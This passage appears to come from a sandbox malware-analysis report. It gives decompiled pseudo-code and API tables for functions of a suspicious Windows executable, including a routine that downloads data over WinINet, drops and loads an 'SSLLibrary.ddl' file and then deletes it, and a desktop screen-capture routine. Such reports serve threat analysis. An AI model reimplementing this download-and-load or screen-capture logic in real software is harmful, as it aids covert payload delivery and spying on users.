				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					L00425F58();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					L00425F58();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(0x428476);
				return E0040277C(_v16);
			}


























                                                    0x00428301
                                                    0x00428303
                                                    0x0042830c
                                                    0x0042830f
                                                    0x00428312
                                                    0x00428316
                                                    0x00428328
                                                    0x00428332
                                                    0x00428342
                                                    0x00428342
                                                    0x00428347
                                                    0x00428353
                                                    0x00428356
                                                    0x00428364
                                                    0x00428372
                                                    0x0042837c
                                                    0x00428385
                                                    0x00428387
                                                    0x00428387
                                                    0x004283a7
                                                    0x004283c4
                                                    0x004283c7
                                                    0x004283d0
                                                    0x004283d5
                                                    0x004283da
                                                    0x004283f0
                                                    0x004283f2
                                                    0x004283f7
                                                    0x004283f9
                                                    0x004283f9
                                                    0x0042840b
                                                    0x00428410
                                                    0x0042841a
                                                    0x00428420
                                                    0x00428425
                                                    0x0042842c
                                                    0x00428444
                                                    0x00428446
                                                    0x0042844b
                                                    0x0042844d
                                                    0x0042844d
                                                    0x00428452
                                                    0x00428458
                                                    0x0042845b
                                                    0x0042845e
                                                    0x0042846e

                                                    APIs
                                                    • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283A2
                                                    • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004283BF
                                                    • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004283EB
                                                    • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042840B
                                                    • DeleteEnhMetaFile.GDI32(00000016), ref: 0042842C
                                                    • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0042843F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileMeta$Bits$DeleteHeader
                                                    • String ID: `
                                                    • API String ID: 1990453761-2679148245
                                                    • Opcode ID: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                    • Instruction ID: d131a5009b9ae6a1c3985c7f4bbb4479256416dcbb727d86a178af25fe9cd39a
                                                    • Opcode Fuzzy Hash: 0c01fd69f92b0b42f0212475d03f564d72d5169141e12a16344919336c70851a
                                                    • Instruction Fuzzy Hash: B7410F75E00218AFDB00DFA9D485AAEB7F9EF48710F50846AF904F7281E7799D40CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00495084 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 101libraryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 65%
                                                    			E00495084(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t55;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t79;
				struct HINSTANCE__* _t82;
				void* _t84;
				intOrPtr _t87;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_push(_t87);
				_push(0x4951d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87;
				_t84 = 3;
				_t55 = 0x49f0f4;
				do {
					if( *_t55 == 0) {
						goto L5;
					} else {
						_t68 =  *0x49f100; // 0x0
						E00404CCC( &_v12, "\\SSLLibrary.ddl", _t68);
						if(E00474D50( *_t55, _t55, _v12, _t84) == 0) {
							_v5 = 0;
							goto L5;
						} else {
							_v5 = 1;
							_t72 =  *0x49f100; // 0x0
							E00404CCC( &_v16, "\\SSLLibrary.ddl", _t72);
							_t82 = LoadLibraryA(E00404E80(_v16));
							_t56 = E0041E0D0(_t82, 1, 0xa, "LIBEAY32");
							_t74 =  *0x49f100; // 0x0
							E00404CCC( &_v20, "\\libeay32.dll", _t74);
							E0041DD9C(_t30, _t56, _v20, _t82);
							L00403BEC(_t56);
							_t57 = E0041E0D0(_t82, 1, 0xa, "SSLEAY32");
							_t77 =  *0x49f100; // 0x0
							E00404CCC( &_v24, "\\ssleay32.dll", _t77);
							E0041DD9C(_t38, _t57, _v24, _t82);
							L00403BEC(_t57);
							FreeLibrary(_t82);
							_t79 =  *0x49f100; // 0x0
							E00404CCC( &_v32, "\\SSLLibrary.ddl", _t79);
							E00404BB8( &_v28, E00404E80(_v32));
							L00409BAC(_v28);
						}
					}
					break;
					L5:
					_t55 = _t55 + 4;
					_t84 = _t84 - 1;
				} while (_t84 != 0);
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(0x4951db);
				return E004049E4( &_v32, 6);
			}




















                                                    0x00495089
                                                    0x0049508a
                                                    0x0049508b
                                                    0x0049508c
                                                    0x0049508d
                                                    0x0049508e
                                                    0x0049508f
                                                    0x00495090
                                                    0x00495091
                                                    0x00495095
                                                    0x00495096
                                                    0x0049509b
                                                    0x0049509e
                                                    0x004950a1
                                                    0x004950a6
                                                    0x004950ab
                                                    0x004950ae
                                                    0x00000000
                                                    0x004950b4
                                                    0x004950bc
                                                    0x004950c2
                                                    0x004950d3
                                                    0x004951ab
                                                    0x00000000
                                                    0x004950d9
                                                    0x004950d9
                                                    0x004950e5
                                                    0x004950eb
                                                    0x004950fe
                                                    0x00495115
                                                    0x0049511f
                                                    0x00495125
                                                    0x0049512f
                                                    0x00495136
                                                    0x00495150
                                                    0x0049515a
                                                    0x00495160
                                                    0x0049516a
                                                    0x00495171
                                                    0x00495177
                                                    0x00495184
                                                    0x0049518a
                                                    0x0049519c
                                                    0x004951a4
                                                    0x004951a4
                                                    0x004950d3
                                                    0x00000000
                                                    0x004951af
                                                    0x004951af
                                                    0x004951b2
                                                    0x004951b2
                                                    0x004951bb
                                                    0x004951be
                                                    0x004951c1
                                                    0x004951d3

                                                    APIs
                                                      • Part of subcall function 00474D50: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00474DAE
                                                      • Part of subcall function 00474D50: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000000,00000000), ref: 00474DDB
                                                      • Part of subcall function 00474D50: InternetReadFile.WININET(?,?,00000400,?), ref: 00474E25
                                                      • Part of subcall function 00474D50: InternetCloseHandle.WININET(?), ref: 00474E6E
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004950F9
                                                    • FreeLibrary.KERNEL32(00000000,0000000A,SSLEAY32,0000000A,LIBEAY32,00000000,00000000,004951D4,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495177
                                                      • Part of subcall function 00409BAC: DeleteFileA.KERNEL32(00000000,0049C9B0,00475D16,00000000,00475D3C), ref: 00409BB7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$FileLibraryOpen$CloseDeleteFreeHandleLoadRead
                                                    • String ID: LIBEAY32$SSLEAY32$\SSLLibrary.ddl$\libeay32.dll$\ssleay32.dll
                                                    • API String ID: 1893608559-2695981766
                                                    • Opcode ID: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                    • Instruction ID: 33ec969f5ea1b72477d048da23142bfffb93f2672bd1290969d982d35f2b6f3b
                                                    • Opcode Fuzzy Hash: b9b64cd10222cbfc43811778c3e9705247d2973ed7e941e70c5c3ecfe2b2726d
                                                    • Instruction Fuzzy Hash: A0319870B042049BDB01EB65DC82BAF7B75EB94304F20857BE901A7392DB7DAD05879C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042C82C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E0042C82C(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x49e92c != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00407298();
						}
						_t24 = 1;
					}
				} else {
					 *0x49e910 = E0042C4FC(4, _t23,  *0x49e910, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                                    0x0042c835
                                                    0x0042c838
                                                    0x0042c842
                                                    0x0042c867
                                                    0x0042c86f
                                                    0x0042c88f
                                                    0x0042c894
                                                    0x0042c89f
                                                    0x0042c8aa
                                                    0x0042c8b4
                                                    0x0042c8b5
                                                    0x0042c8b6
                                                    0x0042c8b7
                                                    0x0042c8b8
                                                    0x0042c8b9
                                                    0x0042c8c3
                                                    0x0042c8c5
                                                    0x0042c8cd
                                                    0x0042c8ce
                                                    0x0042c8ce
                                                    0x0042c8d3
                                                    0x0042c8d3
                                                    0x0042c844
                                                    0x0042c856
                                                    0x0042c863
                                                    0x0042c863
                                                    0x0042c8dd

                                                    APIs
                                                    • GetMonitorInfoA.USER32(?,?), ref: 0042C85D
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042C884
                                                    • GetSystemMetrics.USER32 ref: 0042C899
                                                    • GetSystemMetrics.USER32 ref: 0042C8A4
                                                    • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042C8CE
                                                      • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(768F0000,00000000), ref: 0042C57C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                    • String ID: DISPLAY$GetMonitorInfo
                                                    • API String ID: 1539801207-1633989206
                                                    • Opcode ID: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                    • Instruction ID: fd539ca8d8add89cf6c2a40af9093eb6b2d142832e41177ff4ac11c4fa6a4bef
                                                    • Opcode Fuzzy Hash: fa4bae191739b45e5aec941b0add0c014022072654a4bc21e87a1519e8d0f9cd
                                                    • Instruction Fuzzy Hash: 3211E4B17013109FD720EF66AC84BABB7E9EB05712F40893BE815D7240D3B5A900CBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004047C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E004047C0(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x49e04c == 0) {
					if( *0x49b034 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49e220 == 0xd7b2 &&  *0x49e228 > 0) {
						 *0x49e238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00404848, 2,  &_v4, 0);
				}
			}





                                                    0x004047c8
                                                    0x00404828
                                                    0x00404838
                                                    0x00404838
                                                    0x0040483e
                                                    0x004047ca
                                                    0x004047d3
                                                    0x004047e3
                                                    0x004047e3
                                                    0x004047ff
                                                    0x00404820
                                                    0x00404820

                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000), ref: 004047F9
                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004047FF
                                                    • GetStdHandle.KERNEL32(000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 00404814
                                                    • WriteFile.KERNEL32(00000000,000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 0040481A
                                                    • MessageBoxA.USER32 ref: 00404838
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$Message
                                                    • String ID: Error$Runtime error at 00000000
                                                    • API String ID: 1570097196-2970929446
                                                    • Opcode ID: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                    • Instruction ID: d031fbb1000275bb1cbc2334fc3dd0bc9fcf369acb127de660da951a48ee9705
                                                    • Opcode Fuzzy Hash: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                    • Instruction Fuzzy Hash: F9F096D564038075FE20B3626E07F5B255C8794B19F244ABFB320B50E297BC54C0865D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00448030 Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 55%
                                                    			E00448030(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
				intOrPtr _v8;
				struct HDC__* _v12;
				char _v28;
				char _v44;
				void* __edi;
				void* __ebp;
				void* _t46;
				void* _t57;
				int _t85;
				void* _t119;
				void* _t120;
				void* _t129;
				struct HDC__* _t138;
				struct HDC__* _t139;
				int _t140;
				void* _t141;

				_t121 = __ecx;
				_t137 = __ecx;
				_v8 = __edx;
				_t120 = __eax;
				_t46 = L00447BD0(__eax);
				if(_t46 != 0) {
					_t144 = _a4;
					if(_a4 == 0) {
						__eflags =  *(_t120 + 0x54);
						if( *(_t120 + 0x54) == 0) {
							_t140 = L00429914(1);
							 *(_t120 + 0x54) = _t140;
							E0042AD38(_t140, 1);
							 *((intOrPtr*)( *_t140 + 0x40))();
							_t121 =  *_t140;
							 *((intOrPtr*)( *_t140 + 0x34))();
						}
						E004255DC( *((intOrPtr*)(L00429EDC( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
						E00419804( *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
						_push( &_v44);
						_t57 = L00429EDC( *(_t120 + 0x54));
						_pop(_t129);
						L00425980(_t57, _t129);
						_push(0);
						_push(0);
						_push(0xffffffff);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(L00425C68(L00429EDC( *(_t120 + 0x54))));
						_push(_v8);
						_push(L00447D0C(_t120));
						L0042C454();
						E00419804(_a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
						_v12 = L00425C68(L00429EDC( *(_t120 + 0x54)));
						E004255DC( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000014, _t137, _t141, __eflags);
						_t138 = L00425C68(_t137);
						SetTextColor(_t138, 0xffffff);
						SetBkColor(_t138, 0);
						_t85 = _a16 + 1;
						__eflags = _t85;
						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
						E004255DC( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000010, _t137, _t141, _t85);
						_t139 = L00425C68(_t137);
						SetTextColor(_t139, 0xffffff);
						SetBkColor(_t139, 0);
						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
					}
					_push(_a8);
					_push(L00447A20(_t144));
					E00448008(_t120, _t144);
					_push(L00447A20(_t144));
					_push(0);
					_push(0);
					_push(_a12);
					_push(_a16);
					_push(L00425C68(__ecx));
					_push(_v8);
					_t119 = L00447D0C(_t120);
					_push(_t119);
					L0042C454();
					return _t119;
				}
				return _t46;
			}



















                                                    0x00448030
                                                    0x00448039
                                                    0x0044803b
                                                    0x0044803e
                                                    0x00448042
                                                    0x00448049
                                                    0x0044804f
                                                    0x00448053
                                                    0x00448099
                                                    0x0044809d
                                                    0x004480ab
                                                    0x004480ad
                                                    0x004480b4
                                                    0x004480c0
                                                    0x004480c8
                                                    0x004480ca
                                                    0x004480ca
                                                    0x004480dd
                                                    0x004480f1
                                                    0x004480f9
                                                    0x004480fd
                                                    0x00448102
                                                    0x00448103
                                                    0x00448108
                                                    0x0044810a
                                                    0x0044810c
                                                    0x0044810e
                                                    0x00448110
                                                    0x00448112
                                                    0x00448114
                                                    0x00448123
                                                    0x00448127
                                                    0x0044812f
                                                    0x00448130
                                                    0x0044814c
                                                    0x0044815e
                                                    0x00448169
                                                    0x00448175
                                                    0x0044817d
                                                    0x00448185
                                                    0x004481a7
                                                    0x004481a7
                                                    0x004481aa
                                                    0x004481b7
                                                    0x004481c3
                                                    0x004481cb
                                                    0x004481d3
                                                    0x00000000
                                                    0x004481f6
                                                    0x00448058
                                                    0x00448061
                                                    0x00448064
                                                    0x0044806e
                                                    0x0044806f
                                                    0x00448071
                                                    0x00448076
                                                    0x0044807a
                                                    0x00448082
                                                    0x00448086
                                                    0x00448089
                                                    0x0044808e
                                                    0x0044808f
                                                    0x00000000
                                                    0x0044808f
                                                    0x00448201

                                                    APIs
                                                    • 739F2430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 0044808F
                                                    • 739F2430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448130
                                                    • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0044817D
                                                    • SetBkColor.GDI32(00000000,00000000), ref: 00448185
                                                    • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 004481AA
                                                      • Part of subcall function 00448008: 739F2240.COMCTL32(00000000,?,00448069,00000000,?), ref: 0044801E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ColorF2430$F2240Text
                                                    • String ID:
                                                    • API String ID: 314387739-0
                                                    • Opcode ID: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                    • Instruction ID: f210b0e3c06df9566387ab9d1a3fb44fb9a992e98e90bafaba036239795fc9e8
                                                    • Opcode Fuzzy Hash: 0e3cdef7bdb274e821ccc08bc87dcb32e9a8b685ab06af03303f3fbc7a5d5b72
                                                    • Instruction Fuzzy Hash: 3B510971740214AFDB40FF69DD82F9E37ACAF08714F54015AF904EB286CA78ED458B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043F740 Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0043F740(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				L004398B8(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E00441704(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E00441704(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					L004398B8(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E0043C130(_t82, _t99, 0x14, 0);
				E0043C130(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E0041AC6C( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E0043F740(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                                                    0x0043f74b
                                                    0x0043f74d
                                                    0x0043f74f
                                                    0x0043f75b
                                                    0x0043f765
                                                    0x0043f777
                                                    0x0043f77c
                                                    0x0043f780
                                                    0x0043f795
                                                    0x0043f7af
                                                    0x0043f7b4
                                                    0x0043f7b9
                                                    0x0043f7bb
                                                    0x0043f7c2
                                                    0x0043f7c2
                                                    0x0043f797
                                                    0x0043f797
                                                    0x0043f79e
                                                    0x0043f79e
                                                    0x0043f7c9
                                                    0x0043f7db
                                                    0x0043f7ea
                                                    0x0043f7f7
                                                    0x0043f80f
                                                    0x0043f80f
                                                    0x0043f81f
                                                    0x0043f82f
                                                    0x0043f834
                                                    0x0043f83c
                                                    0x0043f87b
                                                    0x0043f880
                                                    0x0043f885
                                                    0x0043f891
                                                    0x0043f83e
                                                    0x0043f841
                                                    0x0043f844
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f847
                                                    0x0043f84a
                                                    0x0043f851
                                                    0x0043f85a
                                                    0x0043f85f
                                                    0x0043f863
                                                    0x0043f86e
                                                    0x0043f86e
                                                    0x0043f873
                                                    0x0043f876
                                                    0x0043f876
                                                    0x0043f876
                                                    0x00000000
                                                    0x0043f851

                                                    APIs
                                                    • SaveDC.GDI32 ref: 0043F756
                                                      • Part of subcall function 004398B8: GetWindowOrgEx.GDI32(?), ref: 004398C6
                                                      • Part of subcall function 004398B8: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004398DC
                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043F777
                                                    • GetWindowLongA.USER32 ref: 0043F78D
                                                    • GetWindowLongA.USER32 ref: 0043F7AF
                                                    • SetRect.USER32 ref: 0043F7DB
                                                    • DrawEdge.USER32(?,?,?,00000000), ref: 0043F7EA
                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043F80F
                                                    • RestoreDC.GDI32(?,?), ref: 0043F880
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                    • String ID:
                                                    • API String ID: 2976466617-0
                                                    • Opcode ID: c79d6f2aaaf99a46f52f279e4e3e1293840bbc328cda2cdb7d7d29bc77371f5b
                                                    • Instruction ID: 5550dfeaeb93720f68ac000546fd20648b8bffa49c9e266dbbfe82f03f6cc12f
                                                    • Opcode Fuzzy Hash: c79d6f2aaaf99a46f52f279e4e3e1293840bbc328cda2cdb7d7d29bc77371f5b
                                                    • Instruction Fuzzy Hash: C2416671F002046BDB04EA99CC81FDE77A9AF49304F10416AF904EB396D778ED0587A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004751FC Relevance: 12.1, APIs: 8, Instructions: 85windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004751FC() {
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebp;
				intOrPtr* _t45;
				LOGPALETTE* _t57;
				struct HDC__* _t58;
				WORD _t59;
				struct tagRECT* _t60;

				GetWindowRect(GetDesktopWindow(), _t60);
				_t45 = L00429914(1);
				 *((intOrPtr*)( *_t45 + 0x40))();
				 *((intOrPtr*)( *_t45 + 0x34))();
				_t58 = GetDC(0);
				if((GetDeviceCaps(_t58, 0x26) & 0x00000100) == 0x100) {
					_t57 = E0040275C(0x404);
					E004032B4(_t57, 0x404);
					_t57->palVersion = 0x300;
					_t6 =  &(_t57->palPalEntry); // 0x4
					_t59 = GetSystemPaletteEntries(_t58, 0, 0x100, _t6);
					_t57->palNumEntries = _t59;
					if(_t59 != 0) {
						CreatePalette(_t57);
						 *((intOrPtr*)( *_t45 + 0x38))();
					}
					E0040277C(_t57);
				}
				BitBlt(L00425C68(L00429EDC(_t45)), 0, 0, _v32 - _v40, _v28 - _v36, _t58, 0, 0, 0xcc0020);
				ReleaseDC(0, _t58);
				return _t45;
			}















                                                    0x0047520a
                                                    0x0047521b
                                                    0x00475228
                                                    0x00475237
                                                    0x00475241
                                                    0x00475255
                                                    0x00475261
                                                    0x0047526c
                                                    0x00475271
                                                    0x00475276
                                                    0x00475287
                                                    0x00475289
                                                    0x00475290
                                                    0x00475293
                                                    0x0047529e
                                                    0x0047529e
                                                    0x004752a3
                                                    0x004752a3
                                                    0x004752d5
                                                    0x004752dd
                                                    0x004752eb

                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00475204
                                                    • GetWindowRect.USER32 ref: 0047520A
                                                    • GetDC.USER32(00000000), ref: 0047523C
                                                    • GetDeviceCaps.GDI32(00000000,00000026), ref: 00475246
                                                    • GetSystemPaletteEntries.GDI32(00000000,00000000,00000100,00000004), ref: 00475282
                                                    • CreatePalette.GDI32(00000000), ref: 00475293
                                                    • BitBlt.GDI32(00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020), ref: 004752D5
                                                    • ReleaseDC.USER32 ref: 004752DD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: PaletteWindow$CapsCreateDesktopDeviceEntriesRectReleaseSystem
                                                    • String ID:
                                                    • API String ID: 3213150747-0
                                                    • Opcode ID: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                    • Instruction ID: cf87fae2104b332fff4ea17414f726447bb42f5c33e6fb1eed0e3625bbc1caf8
                                                    • Opcode Fuzzy Hash: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                    • Instruction Fuzzy Hash: 222162317442016FD311FA79CC86F5E77989F89314F50453DFA48EB2C2CA79AC0587AA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004265A0 Relevance: 12.1, APIs: 8, Instructions: 79windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
